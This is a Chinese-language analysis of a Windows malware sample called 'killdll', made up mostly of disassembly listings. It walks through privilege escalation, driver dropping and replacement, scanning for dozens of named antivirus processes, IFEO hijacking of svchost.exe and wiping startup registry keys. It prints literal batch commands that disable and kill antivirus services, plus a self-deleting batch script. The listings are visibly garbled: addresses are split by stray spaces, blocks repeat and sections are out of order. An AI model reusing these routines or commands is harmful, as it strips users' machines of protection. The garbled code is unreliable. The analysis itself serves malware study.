00401593 |. 52 push edx ; |pBytesWritten
00401594 |. 8D8424 24030000 lea eax,dword ptr ss:[esp+324 ] ; |
0040159B |. 51 push ecx ; |nBytesToWrite
0040159C |. 50 push eax ; |Buffer
0040159D |. 56 push esi ; |hFile
0040159E |. FF15 7C604000 call dword ptr ds:[<&kernel32.WriteFile>] ; \WriteFile
004015A4 |. 56 push esi ; /hObject
004015A5 |. FF15 84604000 call dword ptr ds:[<&kernel32.CloseHandle>] ; \CloseHandle
004015AB |. 8D8C24 14010000 lea ecx,dword ptr ss:[esp+114]
004015B2 |. 6A 00 push 0 ; / ShowState = SW_HIDE
004015B4 |. 51 push ecx ; |CmdLine
004015B5 |. FF15 2C604000 call dword ptr ds:[<&kernel32.WinExec>] ; \WinExec
004015BB |> 5F pop edi
004015BC |. 5E pop esi
004015BD |. 5B pop ebx
004015BE |. 81C4 04050000 add esp,504
004015C4 \. C3 retn
del "C:\Documents and Settings\Administrator\桌面\g1[1]\UnPacked.exe"
if exist "C:\Documents and Settings\Administrator\桌面\g1[1]\UnPacked.exe" goto Repeat
rmdir C:\Documents and Settings\Administrator\桌面\g1[1 ]
del "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\_undelme.bat"
一、提权10004A60 83EC 14 sub esp ,14
10004A63 8D4424 00 lea eax ,dword ptr ss :[esp ]
10004A67 50 push eax
10004A68 6A 28 push 28
10004A6A FF15 68040010 call dword ptr ds :[<&KERNEL32. GetCurrentProc>
10004A70 50 push eax
10004A71 FF15 14040010 call dword ptr ds :[<&ADVAPI32. OpenProcessTok>
10004A77 85C0 test eax ,eax
10004A79 75 04 jnz short killdll. 10004A7F
10004A7B 83C4 14 add esp ,14
10004A7E C3 retn
10004A7F 8D4C24 08 lea ecx ,dword ptr ss :[esp +8 ]
10004A83 51 push ecx
10004A84 68 E40B0010 push killdll. 10000BE4
10004A89 6A 00 push 0
10004A8B FF15 0C040010 call dword ptr ds :[<&ADVAPI32. LookupPrivileg>
10004A91 85C0 test eax ,eax
10004A93 75 04 jnz short killdll. 10004A99
10004A95 83C4 14 add esp ,14
10004A98 C3 retn
10004A99 8B4424 00 mov eax ,dword ptr ss :[esp ]
10004A9D 6A 00 push 0
10004A9F 6A 00 push 0
10004AA1 8D5424 0C lea edx ,dword ptr ss :[esp +C]
10004AA5 6A 10 push 10
10004AA7 52 push edx
10004AA8 6A 00 push 0
10004AAA 50 push eax
10004AAB C74424 1C 01000000 mov dword ptr ss :[esp +1C],1
10004AB3 C74424 28 02000000 mov dword ptr ss :[esp +28 ],2
10004ABB FF15 10040010 call dword ptr ds :[<&ADVAPI32. AdjustTokenPri>
10004AC1 83C4 14 add esp ,14
10004AC4 C3 retn
二、创建驱动aec.sys10003FEA 8B5424 14 mov edx ,dword ptr ss :[esp +14 ]
10003FEE 6A 00 push 0
10003FF0 6A 00 push 0
10003FF2 6A 02 push 2
10003FF4 6A 00 push 0
10003FF6 6A 00 push 0
10003FF8 68 00000040 push 40000000
10003FFD 52 push edx
10003FFE FF15 94040010 call dword ptr ds :[<&KERNEL32. CreateFileA>]
10004004 8BF0 mov esi ,eax
10004006 85F6 test esi ,esi
10004008 75 05 jnz short killdll. 1000400F
1000400A 5F pop edi
1000400B 5E pop esi
1000400C 5B pop ebx
1000400D 59 pop ecx
1000400E C3 retn
1000400F 8D4424 0C lea eax ,dword ptr ss :[esp +C]
10004013 6A 00 push 0
10004015 50 push eax
10004016 53 push ebx
10004017 57 push edi
10004018 FF15 98040010 call dword ptr ds :[<&KERNEL32. LockResource>]
1000401E 50 push eax
1000401F 56 push esi
10004020 FF15 9C040010 call dword ptr ds :[<&KERNEL32. WriteFile>]
10004026 56 push esi
10004027 FF15 A0040010 call dword ptr ds :[<&KERNEL32. CloseHandle>]
1000402D 5F pop edi
1000402E 5E pop esi
1000402F 83C8 FF or eax ,FFFFFFFF
10004032 5B pop ebx
10004033 59 pop ecx
10004034 C3 retn
三、遍历进程,查找是否存在CCENTER.EXE,CCENTER.EXE是瑞星杀毒软件的相关程序进程100049E0 81EC 28010000 sub esp ,128
100049E6 56 push esi
100049E7 57 push edi
100049E8 6A 00 push 0
100049EA 6A 02 push 2
100049EC E8 CB060000 call <jmp .&KERNEL32. CreateToolhelp32Snapshot>
100049F1 8BF0 mov esi ,eax
100049F3 8D4424 08 lea eax ,dword ptr ss :[esp +8 ]
100049F7 50 push eax
100049F8 56 push esi
100049F9 E8 B8060000 call <jmp .&KERNEL32. Process32First>
100049FE 8BBC24 34010000 mov edi ,dword ptr ss :[esp +134 ]
10004A05 8D4C24 2C lea ecx ,dword ptr ss :[esp +2C]
10004A09 51 push ecx
10004A0A 57 push edi
10004A0B E8 C0060000 call killdll. 100050D0
10004A10 83C4 08 add esp ,8
10004A13 85C0 test eax ,eax
10004A15 74 21 je short killdll. 10004A38
10004A17 8D5424 08 lea edx ,dword ptr ss :[esp +8 ]
10004A1B 52 push edx
10004A1C 56 push esi
10004A1D E8 8E060000 call <jmp .&KERNEL32. Process32Next>
10004A22 85C0 test eax ,eax
10004A24 74 1D je short killdll. 10004A43
10004A26 8D4424 2C lea eax ,dword ptr ss :[esp +2C]
10004A2A 50 push eax
10004A2B 57 push edi
10004A2C E8 9F060000 call killdll. 100050D0
10004A31 83C4 08 add esp ,8
10004A34 85C0 test eax ,eax
10004A36 ^ 75 DF jnz short killdll. 10004A17
10004A38 5F pop edi
10004A39 B0 01 mov al ,1 //存在AL 返回1
10004A3B 5E pop esi
10004A3C 81C4 28010000 add esp ,128
10004A42 C3 retn
10004A43 56 push esi
10004A44 FF15 A0040010 call dword ptr ds :[<&KERNEL32. CloseHandle>]
10004A4A 5F pop edi
10004A4B 32C0 xor al ,al //不存在,AL 清0 ,返回0
10004A4D 5E pop esi
10004A4E 81C4 28010000 add esp ,128
10004A54 C3 retn
//删除AsyncMac.sys1000497B 8D4C24 00 lea ecx ,dword ptr ss :[esp ]
1000497F 68 B00B0010 push killdll. 10000BB0
10004984 51 push ecx
10004985 FF15 C4040010 call dword ptr ds :[<&KERNEL32. lstrcatA>]
1000498B 8D5424 00 lea edx ,dword ptr ss :[esp ]
1000498F 52 push edx
10004990 FF15 60040010 call dword ptr ds :[<&KERNEL32. DeleteFileA>]
//再从自身的资源里释放一个AsyncMac.sys出来,达到替换的目的10003FA0 51 push ecx
10003FA1 53 push ebx
10003FA2 56 push esi
10003FA3 57 push edi
10003FA4 68 04060010 push killdll.10000604
10003FA9 FF15 A8040010 call dword ptr ds :[<&KERNEL32. GetModuleHandl>
10003FAF 8B4C24 18 mov ecx ,dword ptr ss :[esp +18 ]
10003FB3 8BF0 mov esi ,eax
10003FB5 8B4424 1C mov eax ,dword ptr ss :[esp +1C]
10003FB9 81E1 FFFF0000 and ecx ,0FFFF
10003FBF 50 push eax
10003FC0 51 push ecx
10003FC1 56 push esi
10003FC2 FF15 88040010 call dword ptr ds :[<&KERNEL32. FindResourceA>>
10003FC8 8BF8 mov edi ,eax
10003FCA 85FF test edi ,edi
10003FCC 74 5F je short killdll. 1000402D
10003FCE 57 push edi
10003FCF 56 push esi
10003FD0 FF15 8C040010 call dword ptr ds :[<&KERNEL32. SizeofResource>
10003FD6 8BD8 mov ebx ,eax
10003FD8 85DB test ebx ,ebx
10003FDA 74 51 je short killdll. 1000402D
10003FDC 57 push edi
10003FDD 56 push esi
10003FDE FF15 90040010 call dword ptr ds :[<&KERNEL32. LoadResource>]
10003FE4 8BF8 mov edi ,eax
10003FE6 85FF test edi ,edi
10003FE8 74 43 je short killdll. 1000402D
10003FEA 8B5424 14 mov edx ,dword ptr ss :[esp +14 ]
10003FEE 6A 00 push 0
10003FF0 6A 00 push 0
10003FF2 6A 02 push 2
10003FF4 6A 00 push 0
10003FF6 6A 00 push 0
10003FF8 68 00000040 push 40000000
10003FFD 52 push edx
10003FFE FF15 94040010 call dword ptr ds :[<&KERNEL32. CreateFileA>]
10004004 8BF0 mov esi ,eax
10004006 85F6 test esi ,esi
10004008 75 05 jnz short killdll. 1000400F
1000400A 5F pop edi
1000400B 5E pop esi
1000400C 5B pop ebx
1000400D 59 pop ecx
1000400E C3 retn
1000400F 8D4424 0C lea eax ,dword ptr ss :[esp +C]
10004013 6A 00 push 0
10004015 50 push eax
10004016 53 push ebx
10004017 57 push edi
10004018 FF15 98040010 call dword ptr ds :[<&KERNEL32. LockResource>]
1000401E 50 push eax
1000401F 56 push esi
10004020 FF15 9C040010 call dword ptr ds :[<&KERNEL32. WriteFile>]
10004026 56 push esi
10004027 FF15 A0040010 call dword ptr ds :[<&KERNEL32. CloseHandle>]
1000402D 5F pop edi
1000402E 5E pop esi
1000402F 83C8 FF or eax ,FFFFFFFF
10004032 5B pop ebx
10004033 59 pop ecx
10004034 C3 retn
2)创建服务,用来加载替换的驱动AsyncMac.sys10004180 8B5424 2C mov edx ,dword ptr ss :[esp +2C]
10004184 6A 00 push 0
10004186 6A 00 push 0
10004188 6A 00 push 0
1000418A 6A 00 push 0
1000418C 6A 00 push 0
1000418E 52 push edx
1000418F 6A 00 push 0
10004191 6A 03 push 3
10004193 6A 01 push 1
10004195 6A 10 push 10
10004197 68 30060010 push killdll.10000630
1000419C 68 24060010 push killdll.10000624
100041A1 57 push edi
100041A2 FF15 24040010 call dword ptr ds :[<&ADVAPI32. CreateServiceA>
100041A8 8BF0 mov esi ,eax
100041AA FF15 C8040010 call dword ptr ds :[<&KERNEL32. GetLastError>]
100041B0 3D 31040000 cmp eax ,431
100041B5 75 1E jnz short killdll. 100041D5
100041B7 6A 10 push 10
100041B9 68 24060010 push killdll.10000624
100041BE 57 push edi
100041BF FF15 2C040010 call dword ptr ds :[<&ADVAPI32. OpenServiceA>]
100041C5 8BF0 mov esi ,eax
100041C7 8D4424 0C lea eax ,dword ptr ss :[esp +C]
100041CB 50 push eax
100041CC 6A 01 push 1
100041CE 56 push esi
100041CF FF15 34040010 call dword ptr ds :[<&ADVAPI32. ControlService>
100041D5 6A 00 push 0
100041D7 6A 00 push 0
100041D9 56 push esi
100041DA FF15 38040010 call dword ptr ds :[<&ADVAPI32. StartServiceA>>
100041E0 6A 00 push 0
100041E2 6A 00 push 0
100041E4 6A 03 push 3
100041E6 6A 00 push 0
100041E8 6A 03 push 3
100041EA 68 000000C0 push C0000000
100041EF 68 14060010 push killdll.10000614
100041F4 FF15 94040010 call dword ptr ds :[<&KERNEL32. CreateFileA>]
100041FA 56 push esi
100041FB 8B35 30040010 mov esi ,dword ptr ds :[<&ADVAPI32. CloseServic>
10004201 8BE8 mov ebp ,eax
10004203 FFD6 call esi
10004205 57 push edi
10004206 FFD6 call esi
10004208 5E pop esi
10004209 8BC5 mov eax ,ebp
1000420B 5F pop edi
1000420C 5D pop ebp
1000420D 83C4 1C add esp ,1C
10004210 C3 retn
10004211 8B7424 2C mov esi ,dword ptr ss :[esp +2C]
10004215 56 push esi
10004216 8B35 30040010 mov esi ,dword ptr ds :[<&ADVAPI32. CloseServic>
1000421C FFD6 call esi
1000421E 57 push edi
1000421F FFD6 call esi
10004221 5E pop esi
10004222 8BC5 mov eax ,ebp
10004224 5F pop edi
10004225 5D pop ebp
10004226 83C4 1C add esp ,1C
10004229 C3 retn
1000422A 8BC5 mov eax ,ebp
1000422C 5F pop edi
1000422D 5D pop ebp
1000422E 83C4 1C add esp ,1C
10004231 C3 retn
进程为:avp.exe、safeboxTray.exe、360 Safebox.exe、360 tray.exe、antiarp.exe、ekrn.exe、RsAgent.exe、egui.exe、RavMon.exe、RavMonD.exe、RavTask.exe、CCenter.exe、RavStub.exe、RsTray.exe、ScanFrm.exe、Rav.exe、AgentSvr.exe、QQDoctor.exe、McProxy.exe、McNASvc.exe、Mcshield.exe、rsnetsvr.exe、MpfSrv.exe、MPSVC .EXE、MPSVC3 .EXE、KISSvc.exe、kmailmon.exe、KavStart.exe、KPFW32.EXE、KVMonXP.KXP、KVSrvXP.exe、ccSetMgr.exe、ccEvtMgr.exe、defwatch.exe、rtvscan.exe、ccapp.exe、vptray.exe、mcupdmgr.exe、mcproxy.exe、mcshield.exe、MPFSrv .exe、mcsysmon.exe、mcmscsvc.exe、mcnasvc.exe、mcagent.exe、mcshell.exe、mcinsupd.exe、bdagent.exe、livesrv.exe、vsserv.exe、xcommsvr.exe
解密完之后,下面开始遍历进程:1000470 F 6 A 00 push 0
10004711 6 A 02 push 2
10004713 E8 A4090000 call <jmp.&KERNEL32.CreateToolhelp32Snapshot>
10004718 85 C0 test eax,eax
1000471 A 894424 18 mov dword ptr ss:[esp+18 ],eax
1000471 E 0 F84 D8010000 je killdll.100048 FC
10004724 8 D8C24 F4000000 lea ecx,dword ptr ss:[esp+F4 ]
1000472 B C78424 F4000000 2801 >mov dword ptr ss:[esp+F4 ],128
10004736 51 push ecx
10004737 50 push eax
10004738 E8 79090000 call <jmp.&KERNEL32.Process32First>
1000473 D 85 C0 test eax,eax
1000473 F 0 F84 B7010000 je killdll.100048 FC
10004745 8 BAC24 20040000 mov ebp,dword ptr ss:[esp+420 ]
1000474 C 8 B35 54040010 mov esi,dword ptr ds:[<&KERNEL32.WinExec>]
10004752 8 B3D 50040010 mov edi,dword ptr ds:[<&KERNEL32.Sleep>]
10004758 8 D5C24 1 C lea ebx,dword ptr ss:[esp+1 C]
1000475 C C74424 10 35000000 mov dword ptr ss:[esp+10 ],35
10004764 8 B03 mov eax,dword ptr ds:[ebx]
10004766 8 D9424 18010000 lea edx,dword ptr ss:[esp+118 ]
1000476 D 52 push edx
1000476 E 50 push eax
1000476 F E8 5 C090000 call killdll.100050 D0
10004774 83 C4 08 add esp,8
10004777 85 C0 test eax,eax
10004779 0 F85 4 D010000 jnz killdll.100048 CC
1000477 F 8 B8C24 FC000000 mov ecx,dword ptr ss:[esp+FC]
10004786 8 D9424 F0000000 lea edx,dword ptr ss:[esp+F0 ]
1000478 D 50 push eax
1000478 E 52 push edx
1000478 F 50 push eax
10004790 50 push eax
10004791 8 D4424 24 lea eax,dword ptr ss:[esp+24 ]
10004795 6 A 04 push 4
10004797 50 push eax
10004798 68 04202200 push 222004
1000479 D 55 push ebp
1000479 E 894 C24 34 mov dword ptr ss:[esp+34 ],ecx
100047 A2 FF15 C0040010 call dword ptr ds:[<&KERNEL32.DeviceIoContro>
100047 A8 8 D8C24 18010000 lea ecx,dword ptr ss:[esp+118 ]
100047 AF 51 push ecx
100047 B0 68 04090010 push killdll.10000904
100047 B5 E8 16090000 call killdll.100050 D0
100047 BA 83 C4 08 add esp,8
100047 BD 85 C0 test eax,eax
100047 BF 75 18 jnz short killdll.100047 D9
100047 C1 50 push eax
100047 C2 68 DC080010 push killdll.100008 DC
100047 C7 FFD6 call esi
100047 C9 68 C8000000 push 0 C8
100047 CE FFD7 call edi
100047 D0 6 A 00 push 0
100047 D2 68 BC080010 push killdll.100008 BC
100047 D7 FFD6 call esi
100047 D9 8 D9424 18010000 lea edx,dword ptr ss:[esp+118 ]
100047 E0 52 push edx
100047 E1 68 B4080010 push killdll.100008 B4
100047 E6 E8 E5080000 call killdll.100050 D0
100047 EB 83 C4 08 add esp,8
100047 EE 85 C0 test eax,eax
100047 F0 75 18 jnz short killdll.1000480 A
100047 F2 50 push eax
100047 F3 68 8 C080010 push killdll.1000088 C
100047 F8 FFD6 call esi
100047 FA 68 C8000000 push 0 C8
100047 FF FFD7 call edi
10004801 6 A 00 push 0
10004803 68 6 C080010 push killdll.1000086 C
10004808 FFD6 call esi
1000480 A 8 D8424 18010000 lea eax,dword ptr ss:[esp+118 ]
10004811 50 push eax
10004812 68 60080010 push killdll.10000860
10004817 E8 B4080000 call killdll.100050 D0
1000481 C 83 C4 08 add esp,8
1000481 F 85 C0 test eax,eax
10004821 75 58 jnz short killdll.1000487 B
10004823 50 push eax
10004824 68 34080010 push killdll.10000834
10004829 FFD6 call esi
1000482 B 68 C8000000 push 0 C8
10004830 FFD7 call edi
10004832 6 A 00 push 0
10004834 68 08080010 push killdll.10000808
10004839 FFD6 call esi
1000483 B 68 C8000000 push 0 C8
10004840 FFD7 call edi
10004842 6 A 00 push 0
10004844 68 DC070010 push killdll.100007 DC
10004849 FFD6 call esi
1000484 B 68 C8000000 push 0 C8
10004850 FFD7 call edi
10004852 6 A 00 push 0
10004854 68 B0070010 push killdll.100007 B0
10004859 FFD6 call esi
1000485 B 68 C8000000 push 0 C8
10004860 FFD7 call edi
10004862 6 A 00 push 0
10004864 68 84070010 push killdll.10000784
10004869 FFD6 call esi
1000486 B 68 C8000000 push 0 C8
10004870 FFD7 call edi
10004872 6 A 00 push 0
10004874 68 58070010 push killdll.10000758
10004879 FFD6 call esi
1000487 B 8 D8C24 18010000 lea ecx,dword ptr ss:[esp+118 ]
10004882 51 push ecx
10004883 68 4 C070010 push killdll.1000074 C
10004888 E8 43080000 call killdll.100050 D0
1000488 D 83 C4 08 add esp,8
10004890 85 C0 test eax,eax
10004892 75 38 jnz short killdll.100048 CC
10004894 50 push eax
10004895 68 24070010 push killdll.10000724
1000489 A FFD6 call esi
1000489 C 68 C8000000 push 0 C8
100048 A1 FFD7 call edi
100048 A3 6 A 00 push 0
100048 A5 68 F8060010 push killdll.100006 F8
100048 AA FFD6 call esi
100048 AC 68 C8000000 push 0 C8
100048 B1 FFD7 call edi
100048 B3 6 A 00 push 0
100048 B5 68 D0060010 push killdll.100006 D0
100048 BA FFD6 call esi
100048 BC 68 C8000000 push 0 C8
100048 C1 FFD7 call edi
100048 C3 6 A 00 push 0
100048 C5 68 A8060010 push killdll.100006 A8
100048 CA FFD6 call esi
100048 CC 8 B4424 10 mov eax,dword ptr ss:[esp+10 ]
100048 D0 83 C3 04 add ebx,4
100048 D3 48 dec eax
100048 D4 894424 10 mov dword ptr ss:[esp+10 ],eax
100048 D8 ^ 0 F85 86 FEFFFF jnz killdll.10004764
100048 DE 6 A 64 push 64
100048 E0 FFD7 call edi
100048 E2 8 D9424 F4000000 lea edx,dword ptr ss:[esp+F4 ]
100048 E9 8 B4424 18 mov eax,dword ptr ss:[esp+18 ]
100048 ED 52 push edx
100048 EE 50 push eax
100048 EF E8 BC070000 call <jmp.&KERNEL32.Process32Next>
100048 F4 85 C0 test eax,eax
100048 F6 ^ 0 F85 5 CFEFFFF jnz killdll.10004758
100048 FC 8 D7424 1 C lea esi,dword ptr ss:[esp+1 C]
10004900 BF 35000000 mov edi,35
10004905 8 B0E mov ecx,dword ptr ds:[esi]
10004907 51 push ecx
10004908 E8 C3F9FFFF call killdll.100042 D0
1000490 D 83 C4 04 add esp,4
10004910 83 C6 04 add esi,4
10004913 4 F dec edi
10004914 ^ 75 EF jnz short killdll.10004905
10004916 5 F pop edi
10004917 5 E pop esi
10004918 5 D pop ebp
10004919 33 C0 xor eax,eax
1000491 B 5 B pop ebx
1000491 C 81 C4 0 C040000 add esp,40 C
10004922 C2 0400 retn 4
若存在,则用相应的批处理加以结束cmd /c sc config ekrn start= disabled
cmd /c taskkill /im ekrn.exe /f
cmd /c sc config avp start= disabled
cmd /c taskkill /im avp.exe /f
cmd /c sc config McNASvc start= disabled
cmd /c sc config MpfService start= disabled
cmd /c sc config McProxy start= disabled
cmd /c sc config McShield start= disabled
cmd /c sc config mcmscsvc start= disabled
cmd /c sc config XCOMM start= disabled
cmd /c sc config LIVESRV start= disabled
cmd /c sc config scan start= disabled
cmd /c sc config VSSERV start= disabled
4)进行镜像劫持,劫持的地址为C:\WINDOWS\system32\svchost.exe10004905 8B0E mov ecx ,dword ptr ds :[esi ]
10004907 51 push ecx
10004908 E8 C3F9FFFF call killdll. 100042D0 //镜像劫持
100042D0 81EC 04020000 sub esp ,204
100042D6 B9 3F000000 mov ecx ,3F
100042DB 33C0 xor eax ,eax
100042DD 53 push ebx
100042DE 55 push ebp
100042DF 56 push esi
100042E0 57 push edi
100042E1 8D7C24 14 lea edi ,dword ptr ss :[esp +14 ]
100042E5 68 FF000000 push 0FF
100042EA F3:AB rep stos dword ptr es :[edi ]
100042EC 66 :AB stos word ptr es :[edi ]
100042EE AA stos byte ptr es :[edi ]
100042EF B9 3F000000 mov ecx ,3F
100042F4 33C0 xor eax ,eax
100042F6 8DBC24 18010000 lea edi ,dword ptr ss :[esp +118 ]
100042FD F3:AB rep stos dword ptr es :[edi ]
100042FF 66 :AB stos word ptr es :[edi ]
10004301 AA stos byte ptr es :[edi ]
10004302 8D4424 18 lea eax ,dword ptr ss :[esp +18 ]
10004306 50 push eax
10004307 FF15 84040010 call dword ptr ds :[<&KERNEL32. GetSystemDirec>
1000430D 83C9 FF or ecx ,FFFFFFFF
10004310 BF 98060010 mov edi ,killdll.10000698
10004315 33C0 xor eax ,eax
10004317 8D5424 14 lea edx ,dword ptr ss :[esp +14 ]
1000431B F2:AE repne scas byte ptr es :[edi ]
1000431D F7D1 not ecx
1000431F 2BF9 sub edi ,ecx
10004321 8BD9 mov ebx ,ecx
10004323 8BF7 mov esi ,edi
10004325 83C9 FF or ecx ,FFFFFFFF
10004328 8BFA mov edi ,edx
1000432A F2:AE repne scas byte ptr es :[edi ]
1000432C 8BCB mov ecx ,ebx
1000432E 4F dec edi
1000432F C1E9 02 shr ecx ,2
10004332 F3:A5 rep movs dword ptr es :[edi ],dword ptr ds :[es >
10004334 8BCB mov ecx ,ebx
10004336 8D9424 14010000 lea edx ,dword ptr ss :[esp +114 ]
1000433D 83E1 03 and ecx ,3
10004340 8B9C24 18020000 mov ebx ,dword ptr ss :[esp +218 ]
10004347 F3:A4 rep movs byte ptr es :[edi ],byte ptr ds :[esi ]
10004349 BF 4C060010 mov edi ,killdll. 1000064C
1000434E 83C9 FF or ecx ,FFFFFFFF
10004351 F2:AE repne scas byte ptr es :[edi ]
10004353 F7D1 not ecx
10004355 2BF9 sub edi ,ecx
10004357 8BC1 mov eax ,ecx
10004359 8BF7 mov esi ,edi
1000435B 8BFA mov edi ,edx
1000435D 8D9424 14010000 lea edx ,dword ptr ss :[esp +114 ]
10004364 C1E9 02 shr ecx ,2
10004367 F3:A5 rep movs dword ptr es :[edi ],dword ptr ds :[es >
10004369 8BC8 mov ecx ,eax
1000436B 33C0 xor eax ,eax
1000436D 83E1 03 and ecx ,3
10004370 F3:A4 rep movs byte ptr es :[edi ],byte ptr ds :[esi ]
10004372 8BFB mov edi ,ebx
10004374 83C9 FF or ecx ,FFFFFFFF
10004377 F2:AE repne scas byte ptr es :[edi ]
10004379 F7D1 not ecx
1000437B 2BF9 sub edi ,ecx
1000437D 8BF7 mov esi ,edi
1000437F 8BE9 mov ebp ,ecx
10004381 8BFA mov edi ,edx
10004383 83C9 FF or ecx ,FFFFFFFF
10004386 F2:AE repne scas byte ptr es :[edi ]
10004388 8BCD mov ecx ,ebp
1000438A 4F dec edi
1000438B C1E9 02 shr ecx ,2
1000438E F3:A5 rep movs dword ptr es :[edi ],dword ptr ds :[es >
10004390 8BCD mov ecx ,ebp
10004392 8D4424 10 lea eax ,dword ptr ss :[esp +10 ]
10004396 83E1 03 and ecx ,3
10004399 50 push eax
1000439A F3:A4 rep movs byte ptr es :[edi ],byte ptr ds :[esi ]
1000439C 8D8C24 18010000 lea ecx ,dword ptr ss :[esp +118 ]
100043A3 51 push ecx
100043A4 68 02000080 push 80000002
100043A9 FF15 18040010 call dword ptr ds :[<&ADVAPI32. RegCreateKeyA>>
100043AF 85C0 test eax ,eax
100043B1 75 20 jnz short killdll. 100043D3
100043B3 8D7C24 14 lea edi ,dword ptr ss :[esp +14 ]
100043B7 83C9 FF or ecx ,FFFFFFFF
100043BA F2:AE repne scas byte ptr es :[edi ]
100043BC F7D1 not ecx
100043BE 8D5424 14 lea edx ,dword ptr ss :[esp +14 ]
100043C2 51 push ecx
100043C3 52 push edx
100043C4 6A 01 push 1
100043C6 50 push eax
100043C7 8B4424 20 mov eax ,dword ptr ss :[esp +20 ]
100043CB 53 push ebx
100043CC 50 push eax
100043CD FF15 1C040010 call dword ptr ds :[<&ADVAPI32. RegSetValueExA>
100043D3 8B4C24 10 mov ecx ,dword ptr ss :[esp +10 ]
100043D7 51 push ecx
100043D8 FF15 20040010 call dword ptr ds :[<&ADVAPI32. RegCloseKey>]
100043DE 5F pop edi
100043DF 5E pop esi
100043E0 5D pop ebp
100043E1 5B pop ebx
100043E2 81C4 04020000 add esp ,204
100043E8 C3 retn
1000490D 83C4 04 add esp ,4
10004910 83C6 04 add esi ,4
10004913 4F dec edi
10004914 ^ 75 EF jnz short killdll.10004905 //循环处理
//卸载10004286 68 20000100 push 10020
1000428B 68 24060010 push killdll.10000624
10004290 57 push edi
10004291 FF15 2C040010 call dword ptr ds :[<&ADVAPI32. OpenServiceA>]
10004297 8BF0 mov esi ,eax
10004299 EB 04 jmp short killdll. 1000429F
1000429B 8B7424 2C mov esi ,dword ptr ss :[esp +2C]
1000429F 8B1D 30040010 mov ebx ,dword ptr ds :[<&ADVAPI32. CloseServic>
100042A5 85F6 test esi ,esi
100042A7 74 11 je short killdll. 100042BA
100042A9 8D4C24 0C lea ecx ,dword ptr ss :[esp +C]
100042AD 51 push ecx
100042AE 6A 01 push 1
100042B0 56 push esi
100042B1 FF15 34040010 call dword ptr ds :[<&ADVAPI32. ControlService>
100042B7 56 push esi
100042B8 FFD3 call ebx
100042BA 57 push edi
100042BB FFD3 call ebx
100042BD 5E pop esi
100042BE 5B pop ebx
100042BF 5F pop edi
100042C0 83C4 1C add esp ,1C
100042C3 C3 retn
//删除10004DFB 83C4 08 add esp ,8
10004DFE 8D5424 04 lea edx ,dword ptr ss :[esp +4 ]
10004E02 52 push edx
10004E03 FF15 60040010 call dword ptr ds :[<&KERNEL32. DeleteFileA>]
10004FA0 E8 BBFDFFFF call killdll.10004D60
7)用批处理处理掉瑞星的相关服务和进程10004FA5 8B35 54040010 mov esi ,dword ptr ds :[<&KERNEL32. WinExec>]
10004FAB 6A 00 push 0
10004FAD 68 640D0010 push killdll. 10000D64
10004FB2 FFD6 call esi
10004FB4 8B3D 50040010 mov edi ,dword ptr ds :[<&KERNEL32. Sleep>]
10004FBA 68 C8000000 push 0C8
10004FBF FFD7 call edi
10004FC1 6A 00 push 0
10004FC3 68 380D0010 push killdll. 10000D38
10004FC8 FFD6 call esi
10004FCA 68 C8000000 push 0C8
10004FCF FFD7 call edi
10004FD1 6A 00 push 0
10004FD3 68 0C0D0010 push killdll. 10000D0C
10004FD8 FFD6 call esi
10004FDA 68 C8000000 push 0C8
10004FDF FFD7 call edi
10004FE1 6A 00 push 0
10004FE3 68 E00C0010 push killdll. 10000CE0
10004FE8 FFD6 call esi
10004FEA 68 C8000000 push 0C8
10004FEF FFD7 call edi
10004FF1 6A 00 push 0
10004FF3 68 B40C0010 push killdll. 10000CB4
10004FF8 FFD6 call esi
8)删除完HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下面的所有内容,清空启动项10004F20 51 push ecx
10004F21 68 840C0010 push killdll. 10000C84
10004F26 68 02000080 push 80000002
10004F2B FF15 3C040010 call dword ptr ds :[<&ADVAPI32. RegDeleteKeyA>>
10004F31 8D4424 00 lea eax ,dword ptr ss :[esp ]
10004F35 50 push eax
10004F36 68 840C0010 push killdll. 10000C84
10004F3B 68 02000080 push 80000002
10004F40 FF15 18040010 call dword ptr ds :[<&ADVAPI32. RegCreateKeyA>>
10004F46 8B4C24 00 mov ecx ,dword ptr ss :[esp ]
10004F4A 51 push ecx
10004F4B FF15 20040010 call dword ptr ds :[<&ADVAPI32. RegCloseKey>]
10004F51 59 pop ecx
10004F52 C3 retn
一、把病毒文件updater.exe设为自启动00401D80 |. 50 push eax
00401D81 |. 68 50134000 push ~Frm.00401350
00401D86 |. 68 02000080 push 80000002
00401D8B |. F3:A4 rep movs byte ptr es :[edi ],byte ptr ds :[esi ]
00401D8D |. FF15 08104000 call dword ptr ds :[<&ADVAPI32. RegCreateKeyA>>
00401D93 |. 85C0 test eax ,eax
00401D95 |. 75 45 jnz short ~Frm. 00401DDC
00401D97 |. 50 push eax
00401D98 |. 68 98134000 push ~Frm.00401398
00401D9D |. 68 90134000 push ~Frm.00401390
00401DA2 |. 6A FA push -6
00401DA4 |. FFD3 call ebx
00401DA6 |. 8D7C24 68 lea edi ,dword ptr ss :[esp +68 ]
00401DAA |. 83C9 FF or ecx ,FFFFFFFF
00401DAD |. 33C0 xor eax ,eax
00401DAF |. 8B5424 10 mov edx ,dword ptr ss :[esp +10 ]
00401DB3 |. F2:AE repne scas byte ptr es :[edi ]
00401DB5 |. F7D1 not ecx
00401DB7 |. 51 push ecx
00401DB8 |. 8D4C24 6C lea ecx ,dword ptr ss :[esp +6C]
00401DBC |. 51 push ecx
00401DBD |. 6A 01 push 1
00401DBF |. 50 push eax
00401DC0 |. 68 48134000 push ~Frm.00401348
00401DC5 |. 52 push edx
00401DC6 |. FF15 00104000 call dword ptr ds :[<&ADVAPI32. RegSetValueExA>
00401DCC |. 6A 00 push 0
00401DCE |. 68 98134000 push ~Frm.00401398
00401DD3 |. 68 90134000 push ~Frm.00401390
00401DD8 |. 6A FA push -6
00401DDA |. FFD3 call ebx
00401DDC |> 8B4424 10 mov eax ,dword ptr ss :[esp +10 ]
00401DE0 |. 50 push eax
00401DE1 |. FF15 04104000 call dword ptr ds :[<&ADVAPI32. RegCloseKey>]
00401DE7 |> 68 38134000 push ~Frm.00401338
二、在临时文件夹下生成文件tmp.tmp00401E72 |. E8 A9F7FFFF call ~Frm.00401620
00401620 /nbsp
00401624 |. 8B4424 0C mov eax ,dword ptr ss :[esp +C]
00401628 |. 53 push ebx
00401629 |. 56 push esi
0040162A |. 57 push edi
0040162B |. 81E1 FFFF0000 and ecx ,0FFFF
00401631 |. 50 push eax
00401632 |. 51 push ecx
00401633 |. 6A 00 push 0
